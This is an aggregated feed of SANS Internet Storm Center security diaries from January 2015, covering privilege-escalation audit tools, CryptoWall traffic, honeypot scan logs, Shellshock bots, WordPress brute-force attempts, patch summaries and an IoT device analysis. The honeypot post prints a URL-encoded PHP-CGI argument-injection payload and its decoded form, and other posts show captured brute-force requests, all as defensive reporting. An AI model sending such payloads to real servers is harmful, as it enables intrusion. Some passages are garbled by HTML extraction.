Latest Alerts

Syndicate content SANS Internet Storm Center, InfoCON: green
Updated: 38 min 10 sec ago

Finding Privilege Escalation Flaws in Linux, (Tue, Jan 20th)

Wed, 01/21/2015 - 06:27

We often tend to ignore privilege escalation flaws. In order to take advantage of these vulnerabilities, an attacker first needs to have access to the system itself. But in particular for systems that many users have access to, it can be difficult to monitor them all for compromised credentials. Systems with web servers often suffer from web application flaws that can be used to execute code as the web server, which then can be used to gain root access via a privilege escalation flaw.

From a defensive point of view, the problem with privilege escalation flaws is that there are so many of them, and they are not limited to bugs that can be patched. Frequently configuration mistakes can give rise to privilege escalation flaws. Auditing your system for these problems should be done regularly to avoid privilege escalation flaws.

For example, a user may create a cron job, and then have root execute the cron job, but the file remains writable by the user. Someone gaining access to the system as this user could now easily escalate privilegesby modifying the script.

Luckily, there are a number of scripts that make it easier for us to find these problems:

unix-privesc-check: Very comprehensive script that works on many Unix flavors, not just Linux. Read the ToDo section at the beginning as it lists other areas that should be checked. The output is send to stdout, and you better pipe it to a file as it is very verbose even in default mode.

http://pentestmonkey.net/tools/audit/unix-privesc-check

LinEnum: A more limited script as far as privilege escaltion goes, but it does summarize other configuration options nicely.

https://github.com/rebootuser/LinEnum

linuxprivchecker: Similar to LinEnum in that it summarizes system configuration information, not just privilege escalation issues.

http://www.securitysift.com/download/linuxprivchecker.py

And if you prefer to take a more manual approach, or if you need to verify some of the results produced by the scripts, check this very nice cheat sheet:

http://www.rebootuser.com/?p=1623

Any tools I missed? Please let me know!

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, January 21st 2015 http://isc.sans.edu/podcastdetail.html?id=4321, (Wed, Jan 21st)

Tue, 01/20/2015 - 21:29
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, January 20th 2015 http://isc.sans.edu/podcastdetail.html?id=4319, (Tue, Jan 20th)

Mon, 01/19/2015 - 20:24
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Traffic Patterns For CryptoWall 3.0, (Mon, Jan 19th)

Mon, 01/19/2015 - 08:39

This is a guest diary submitted by Brad Duncan.

Various sources have reported version 3 of CryptoWall has appeared [1] [2] [3]. This malware is currently seen from exploit kits and phishing emails. CryptoWall is one of many ransomware trojans that encrypt the personal files on your computer and demand a bitcoin payment before you can unlock them.

I got a sample on Wednesday, January 14th 2015 while infecting a virtual machine (VM) from a malicious server hosting the Magnitude exploit kit.

If youre registered with Malwr.com, you can get a copy of this CryptoWall 3.0 sample at:

https://malwr.com/analysis/MDA0MjIzOGFiMzVkNGEzZjg3NzdlNDAxMDljMDQyYWQ/

Lets look at the traffic from my infected VM:

In this example, the infected VM checked ip-addr.es to determine its public IP address. Then the VM communicated with a server at 194.58.109.158 over a non-standard HTTP port. In this case it was port 2525, but I saw different ports in other hosts Ive infected with this sample.

Finally, the user viewed a web page for the decrypt instructions at 5.199.166.220.

When monitoring the infection traffic with Security Onion [5], we see an EmergingThreats alert for CryptoWall check-in [4].

The decryption instructions specify the following bitcoin account for a ransom payment: 1GJRTp9YRKFEvzZCTSaRAzrHskFjEwsZy

Heres what the user would see on their desktop screen:

----------

Brad Duncan is a Security Researcher at Rackspace, and he runs a blog on malware traffic analysis at http://www.malware-traffic-analysis.net

References:

[1] http://malware.dontneedcoffee.com/2015/01/guess-whos-back-again-cryptowall-30.html
[2] http://www.bleepingcomputer.com/forums/t/563169/after-a-brief-hiatus-malware-developers-release-cryptowall-3/
[3] https://forums.malwarebytes.org/index.php?/topic/163485-cryptowall-30/
[4] http://doc.emergingthreats.net/2018452
[5] http://blog.securityonion.net/p/securityonion.html

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Monday, January 19th 2015 http://isc.sans.edu/podcastdetail.html?id=4317, (Mon, Jan 19th)

Sun, 01/18/2015 - 16:49
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Strange & Random GET PHP Queries, (Sun, Jan 18th)

Sun, 01/18/2015 - 15:36

Over the past few months, I have been observing strange web queries against my honeypot where the pattern is always the same, a combination of two letters but each instance using two different letters. The pattern starts with pair of two letters, then three by dropping the last letter and last ending with the remainder 2 letters. Here are some examples:

/ewew/ewe/ew.php
/fcfc/fcf/fc.php
/bpbp/bpb/bp.php
/wcwc/wcw/wc.php
/ovov/ovo/ov.php

I have also been regularly getting requests for the Linksys CGI script /tmUnblock.cgi (GET/POST) associated with TheMoon Linksys worm [1], Wordpress login /wp-login.php [2], Coldfusion administrator page /CFIDE/administrator as well a multitude of other stuff listed below.

/cgi-bin/test-cgi
/user/soapCaller.bs
/admin.php
/MyAdmin/scripts/setup.php
/phpMyAdmin/scripts/setup.php
/pma/scripts/setup.php
/a2billing/customer/javascript/misc.js

This last example is URL encoded:

/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

Which equate to: [3]

-d allow_url_include=on %2Dd safe_mode=off -d suhosin.simulation=on -d disable_functions= -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redi%72ect=0 -d cgi.redirect_status_env=0 -n

[1] https://isc.sans.edu/forums/diary/More+Details+About+TheMoon+Linksys+Worm/17669
[2] https://isc.sans.edu/forums/diary/Strange+wordpress+login+patterns/19191/
[3] http://www.asciitohex.com

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Shellshock keeps on giving!, (Fri, Jan 16th)

Fri, 01/16/2015 - 10:43

It has been 12 years since the SQL Slammer worm plagued the Interwebs .. come to think of it, that was also in January. But thats not the point :). Today, twelve years later, there are amazingly still infected Slammer drones out there, and if you are running a Honeypot on udp/1434, I promise you wont have to wait all that long until an ancient piece of malware history comes a-knockin.

Odds are that Shellshock exploits wont have the same stamina, primarily because the Shellshock attack is not self-contained wormy in one packet, but rather usually pushed by previously Shellshocked bots that scan for targets. But it still looks like Shellshock scanning and bot-pushing will now be background noise for the foreseeable future, because there is a surprising number of systems out there that remain vulnerable. Systems that our sensors then pick up as being part of a Shellbot army. Investigating one of these bots recently, I discovered that it was a Slackware installation from 2007 and appeared to be a remote weather sensor, complete with webcam that showed the (sadly, very green) ski slope below. I managed to track down the owner, a hotel in Switzerland, who were unaware that their weather station contained a computer. If our DShield logs are any indication, there are A LOT of these devices (and hotels, etc ..) out there.

Here is what you can do to help." />

The address in the red box - 76.12.A.B in this case - is from where you are being scanned. This does not mean that the originator is evil. Most likely, it is just another weather station or deep fryer where the owner is unaware. So if you contact them, be gentle, and prepared to explain a lot :)

The address in the blue box - 91.142.C.D in this case - is from where the bot code is being pulled. This is most commonly a hacked web server, or a throwaway free website hosting account. In this case, you can locate the hoster via Whois, and make use of their Abuse contact address to let them know. If you include a log snippet like shown above, most hosters will respond and take the bot code down.

A third thing that you can do is download the bot code (carefully :) to your machine, by going to http://91.142.C.D/img.txt in this case. I am not a lawyer (so dont take my word for it) but since the activity is clearly malicious, and since your computer was instructed by the scanning bot to download this code, I would say that doing so on your own is okay. The bot code itself is not very interesting, but the ones weve seen so far are usually written in Perl, and contain a hard-coded IP address used for the CommandControl. Again, you can determine the hoster of that CC address via Whois, and let them know.

The latter two measures will though leave the original victim infected and vulnerable. So .. if you have the time and patience, and it looks like the scanning host is in a residential or small business address range (think DSL), then it might be worthwhile to try and contact the original victim (76.12.A.B above), and enlighten them about all the unexpected things in life that contain a computer these days.

Another word of caution: Obviously, a bot that is scanning you for the presence of Shellshock is most likely vulnerable to Shellshock itself, and missing a plethora of other patches. You might be tempted to poke back at the system, and use the Shellshock conduit on your own to determine what is inside. Doing so though is hacking, and illegal. Owners of hacked systems do not appreciate getting hacked once more by researchers, no matter how allegedly well-intentioned the researcher is. For the hotel weather station that I mention above, I used a passive combination of reverse DNS, Google, archive.org, Netcraft and Whois to determine what it was, and whom to contact.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Friday, January 16th 2015 http://isc.sans.edu/podcastdetail.html?id=4315, (Fri, Jan 16th)

Thu, 01/15/2015 - 17:29
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

tcp/6379 trolling - Redis NoSQL? Or something else?, (Thu, Jan 15th)

Thu, 01/15/2015 - 16:39

DShield sensors report an uptick of scanning for tcp/6379, currently mostly originating from 61.160.x and 61.240.144.x, which are both CHINANET/UNICOM. tcp/6379 is the default port of the Redis NoSQL database (http://redis.io) and Redis by default accepts connections from any">Redis is designed to be accessed by trusted clients inside trusted environments. This means that usually it is not a good idea to expose the Redis instance directly to the internet

which makes us wonder if the service scanned for in this case is indeed Redis, or something else?" />

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Strange wordpress login patterns, (Thu, Jan 15th)

Thu, 01/15/2015 - 15:48

Reader Robert came today with a very interesting situation. He noticed odd wordpress login patterns:

T 31.47.254.62:51020 - +http://www.google.com/bot.html).
Host: **redacted**
Accept: */*.
Cookie: wordpress_test_cookie=WP+Cookie+check.
Content-Length: 131.
Content-Type: application/x-www-form-urlencoded.
.
log=adminpwd=admin%21%21%21wp-submit=Log+Inredirect_to=http://**redacted**/wp-admin/tes1a0">T 62.210.207.146:43322 - +http://www.google.com/bot.html).
Host: **redacted**
Accept: */*.
Cookie: wordpress_test_cookie=WP+Cookie+check.
Content-Length: 113.
Content-Type: application/x-www-form-urlencoded.
.
log=ahenrypwd=Ahenry%24%24%24wp-submit=Log+Inredirect_to=http://**redacted**/wp-admin/tes1a0">T 109.199.82.5:46902 - +http://www.google.com/bot.html).
Host: **redacted**
Accept: */*.
Cookie: wordpress_test_cookie=WP+Cookie+check.
Content-Length: 110.
Content-Type: application/x-www-form-urlencoded.
.
log=natemcpwd=Johns666wp-submit=Log+Inredirect_to=http://**redacted**/wp-admin/tes1a0">">tes1a0 in the Wordpress 4.1 installation download and its not part of the code. It">Have you seen this kind of wordpress attempts? If yes, let us know via Contact form. I will update the diary with the information gathered.

Manuel Humberto Santander Pelez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, January 15th 2015 http://isc.sans.edu/podcastdetail.html?id=4313, (Thu, Jan 15th)

Wed, 01/14/2015 - 18:43
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Which security tool is your favorite?, (Wed, Jan 14th)

Wed, 01/14/2015 - 14:00

Toolswatch published today the best 2014 security tools according to their readers. I like to use From that list I like OWASP ZAP, BeEF, OWASP Xenotix and PeStudio. However, I definitely miss some tools like the one contained in REMnux Distro for malware analysis, DFF and the SANS SIFT 3 distro for forensics, not to mention Wireshark and tcpdump, which I find unique for anomaly detection.

Which security tool is your favorite? Do you agree with the tools listed? Let us know via contact form or comment to this diary.

Manuel Humberto Santander Pelez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Please help us make the ISC better, and participate in our annual survey https://www.surveymonkey.com/s/DHZVY28, (Wed, Jan 14th)

Wed, 01/14/2015 - 09:22

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, January 14th 2015 http://isc.sans.edu/podcastdetail.html?id=4311, (Wed, Jan 14th)

Tue, 01/13/2015 - 17:33
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Adobe Patch Tuesday - January 2015, (Tue, Jan 13th)

Tue, 01/13/2015 - 12:25

Adobe released one bulletin today, affecting Flash Player. The update should be applied to Windows, OS X as well as Linux versions of Adobes Flash player. It is rated with a priority of 1 for most Windows versions of Flash Player.

Adobe Air, as well as browser like Chrome and Internet Explorer are affected as well.

http://helpx.adobe.com/security/products/flash-player/apsb15-01.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Adobe Patch Tuesday - January 2015, (Tue, Jan 13th)

Tue, 01/13/2015 - 12:25

Adobe released one bulletin today, affecting Flash Player. The update should be applied to Windows, OS X as well as Linux versions of Adobes Flash player. It is rated with a priority of 1 for most Windows versions of Flash Player.

Adobe Air, as well as browser like Chrome and Internet Explorer are affected as well.

http://helpx.adobe.com/security/products/flash-player/apsb15-01.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Microsoft Patch Tuesday - January 2015 (Really? Telnet?), (Tue, Jan 13th)

Tue, 01/13/2015 - 10:26

Overview of the January 2015 Microsoft patches and their status.

# Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*) clients servers MS15-001 Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege
(ReplacesMS13-031 MS13-046 MS13-048 MS13-063 ) Microsoft Windows

CVE-2015-0002 KB 3023266 vuln. public. Severity:Important
Exploitability: 2 Important Important MS15-002 Vulnerability in Windows Telnet Service Could Allow Remote Code Execution Microsoft Windows KB 3020393 . Severity:Critical
Exploitability: 2 Important Critical MS15-003 Vulnerability in Windows User Profile Service Could Allow Elevation of Privilege Microsoft Windows

CVE-2015-0004 KB 3021674 vuln. public. Severity:Important
Exploitability: 2 Important Important MS15-004 Vulnerability in Windows Components Could Allow Elevation of Privilege Microsoft Windows

CVE-2015-0016 KB 3025421 . Severity:Important
Exploitability: 0 Important Important MS15-005 Vulnerability in Network Location Awareness Service Could Allow Security Feature Bypass Microsoft Windows

CVE-2015-0006 KB 3022777 . Severity:Important
Exploitability: 3 Important Important MS15-006 Vulnerability in Windows Error Reporting Could Allow Security Feature Bypass
(ReplacesMS14-071 ) Microsoft Windows

CVE-2015-0001 KB 3004365 . Severity:Important
Exploitability: 2 Important Important MS15-007 Vulnerability in Network Policy Server RADIUS Implementation Could Cause Denial of Service Microsoft Windows

CVE-2015-0015 KB 3014029 . Severity:Important
Exploitability: 3 Important Important MS15-008 Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
(ReplacesMS08-007 ) Microsoft Windows

CVE-2015-0011 KB 3019215 . Severity:Important
Exploitability: 2 Important Important We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY (*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become interesting">Less Urt practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
    • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threatatches.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, January 13th 2015 http://isc.sans.edu/podcastdetail.html?id=4309, (Tue, Jan 13th)

Mon, 01/12/2015 - 18:19
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Are You Piratebay? thepiratebay.org Resolving to Various Hosts, (Mon, Jan 12th)

Mon, 01/12/2015 - 15:24

Thanks to our reader David for sending us this detect (anonymized):

GET announce?info_hash=....peer_id=....ip=....port=....uploaded=....downloaded=....*left=....numwant=.... HTTP/1.0
Host: a.tracker.thepriatebay.org
User-Agent: Bittorrent
Accept: */*
Connection: closed

Davids web server was hit with a sufficient number of requests like the one above to cause a denial of service. The requests originated from thousands of different IP addresses, all appear to be located in China. A quick Google search revealed that he wasnt alone, but other web servers experienced similar attacks.

Given the host header (and David observed various thepriatebay.org host names), it looks like some DNS servers responded with Davids IP address if queried for thepiratebay.org.

I did a quick check of passive DNS systems, and didnt find Davids IP. But when I queried Chinese DNS servers for the host name, I recieved numerous answers. Each answer was only repeated a couple times, if at all. It sort of looked like they all returned different IP addresses. US based DNS servers on the other hand usually dont resolve the host name, or respond with 127.0.0.1, a typical blacklisting technique. Only a handful responded with a routable IP address.

Overall, I am not sure what is happening. Looks like a Chinese firewall issue to me. But if you have any ideas or packets, please let me know.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

IoT: The Rise of the Machines (Guest Diary), (Mon, Jan 12th)

Mon, 01/12/2015 - 07:27

[This is a guest diary submitted by Xavier Mertens]

Our houses and offices are more and more infested by electronic devices embedding a real computer with anoperating system and storage. They areconnected to network resources for remote management, statistics or datapolling. This is called the Internet of Things or IoT. My home network ishardened and any new (unknown)device connected to it receives an IP address from a specific range which has no connectivity with other hosts or theInternet but its packets are logged. The goal is to detect suspicious activity like data leaks or unexpected firmwareupdates. The last toy I boughtyesterday is aSmart Plugfrom Supra-Electronics. This device allows you to control apower plug via your mobile device and calculate the energyconsumption with nice stats. I had a very goodopportunity to buy one for a very low price (25). Lets see whats inside....

The documentation mentions a setup procedure and management via a mobile device (with a free app for IOS orAndroid) but the first reflex is to scan the box. Interesting, a webserver as well as a telnet server are waiting forpackets. Lets try common credentials like admin/admin and...

$ telnet 192.168.254.225
Trying 192.168.254.225...
Connected to 192.168.254.225.
Escape character is ^].
(none) login: admin
Password:
BusyBox v1.12.1 (2014-07-31 06:32:52 CEST) built-in shell (ash)
Enter help for a list of built-in commands.
#

Immediately after the boot sequence, the device started to try to communicate with remote hosts:


Amongst DNS requests and NTP synchronization, a lot of traffic was generated to different IP addresses overUDP/10001. The same packet being sent to different hosts. The payload was a block of 60 bytes:



I was not able to decode the content of this payload, please comment if you recognize some patterns. The devicealso performs a regular connectivity check via a single ICMP ECHO packet sent towww.google.com(every 5 mins).This network traffic is generated by the process called RDTServer:

# ps
PID USER VSZ STAT COMMAND
1 admin 1400 S init
2 admin 0 SWN [ksoftirqd/0]
3 admin 0 SW [events/0]
4 admin 0 SW [khelper]
5 admin 0 SW [kthread]
6 admin 0 SW [kblockd/0]
7 admin 0 SW [kswapd0]
8 admin 0 SW [pdflush]
9 admin 0 SW [pdflush]
10 admin 0 SW [aio/0]
11 admin 0 SW [mtdblockd]
18 admin 1084 S nvram_daemon
19 admin 1612 S goahead
20 admin 872 R RDTServer
24 admin 1400 R telnetd
26 admin 872 S RDTServer
27 admin 872 S RDTServer
33 admin 872 S RDTServer
34 admin 872 S RDTServer
35 admin 872 S RDTServer
36 admin 872 S RDTServer
53 admin 1400 S /bin/sh
238 admin 0 SW [RtmpCmdQTask]
239 admin 0 SW [RtmpWscTask]
366 admin 1400 S -sh
505 admin 1400 R ps
678 admin 1400 S udhcpd /etc/udhcpd.conf
1116 admin 1396 S udhcpc -i apcli0 -s /sbin/udhcpc.sh -p /var/run/udhcp
1192 admin 872 S RDTServer
1207 admin 772 S ntpclient -s -c 0 -hntp.belnet.be-i 86400
#

I grabbed a copy of the RDTServer binary (Mips) and using the strings command against the file revealedinteresting stuff. The IP addresses used were found in the binary:

IP FQDN NetName Country
50.19.254.134 m1.iotcplatform.com AMAZON-EC2-8 US
122.248.234.207 m2.iotcplatform.com AMAZON-EC2-SG Singapore
46.137.188.54 m3.iotcplatform.com AMAZON-EU-AWS Ireland
122.226.84.253 JINHUA-MEIDIYA-LTD China
61.188.37.216 CHINANET-SC China
220.181.111.147 CHINANET-IDC-BJ China
120.24.59.150 m4.iotcplatform.com ALISOFT China
114.215.137.159 m5.iotcplatform.com ALISOFT China
175.41.238.100 AMAZON-AP-RESOURCES-JP Japan


Seeing packets sent to China is often suspicious! The domain nameiotcplatform.combelongs toThroughTek, a company specialized in IoT and M2M (Machine toMachine) connection platforms:

Domain Name:IOTCPLATFORM.COM
Registry Domain ID: 1665166563_DOMAIN_COM-VRSN
Registrar WHOIS Server:whois.godaddy.com
Registrar URL:http://www.godaddy.com
Update Date: 2014-07-09T11:44:15Z
Creation Date: 2011-07-04T08:50:36Z
Registrar Registration Expiration Date: 2016-07-04T08:50:36Z
Registrar:GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email:abuse@godaddy.com
Registrar Abuse Contact Phone: +1.480-624-2505
Registry Registrant ID:
Registrant Name: Charles Kao
Registrant Organization:
Registrant Street: 4F., No.221, Chongyang Rd.,
Registrant City: Taipei
Registrant State/Province: Nangang District
Registrant Postal Code: 11573
Registrant Country: Taiwan
Registrant Phone: +886.886226535111
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email:justin_yeh@tutk.com

In fact, theIOTC platformis a service developed by ThoughTek to establish P2P communications between devices.I read the documentation provided with the device as well as all the website pages and there is no mention of thisservice. Manufacturers should include some technical documentation about the network requirements (ex: todownload firmware updates). In this case, its not a major security issue but this story enforces what we alreadyknow (and be afraid) about IoT: those devices have weak configuration and they lack of visibility/documentationabout their behavior. Take care when connecting them on your network. A best practice is to inspect the traffic theygenerate once online (DNS requests, HTTP(S) request or any other protocol).

--
If the enemy leaves a door open, you must rush in. - Sun Tzu
PGP Key:http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x42D006FD51AD7F2C

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts